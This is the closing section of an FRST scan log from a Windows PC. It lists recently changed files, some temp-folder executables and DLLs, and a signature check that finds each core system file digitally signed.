2017-05-11 22:02 - 2013-08-22 15:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2017-05-11 21:59 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-11 21:58 - 2017-02-26 22:51 - 00000000 ____D C:\Users\Oli\AppData\Local\CrashDumps
2017-05-11 21:56 - 2013-08-22 17:36 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2017-05-11 19:16 - 2017-04-05 09:21 - 00001944 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-05-10 10:40 - 2017-02-19 03:26 - 00818732 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-08 09:00 - 2017-02-19 03:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-04 11:12 - 2017-04-07 14:55 - 00000000 ____D C:\Users\Oli\Desktop\MGR
2017-05-02 12:38 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-04-29 00:44 - 2017-02-23 23:42 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 00:44 - 2017-02-23 23:42 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-22 21:47 - 2017-04-15 16:40 - 00215950 _____ C:\Users\Oli\Desktop\1993.xlsx
2017-04-22 21:47 - 2017-04-06 22:40 - 00031202 _____ C:\Users\Oli\Desktop\analiza 1.xlsx
2017-04-22 21:47 - 2017-04-03 20:08 - 00053688 _____ C:\Users\Oli\Desktop\1989.xlsx

Some files in TEMP:
====================
2017-03-23 17:19 - 2017-03-23 17:19 - 4074250 _____ (Napisy24.pl ) C:\Users\Oli\AppData\Local\Temp\Napisy24.exe
2017-04-03 18:15 - 2006-10-27 23:14 - 0145184 ____R (Microsoft Corporation) C:\Users\Oli\AppData\Local\Temp\ose00000.exe
2017-02-24 22:22 - 2017-02-24 22:22 - 0039245 _____ () C:\Users\Oli\AppData\Local\Temp\t.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-05-08 15:38

==================== End of FRST.txt ============================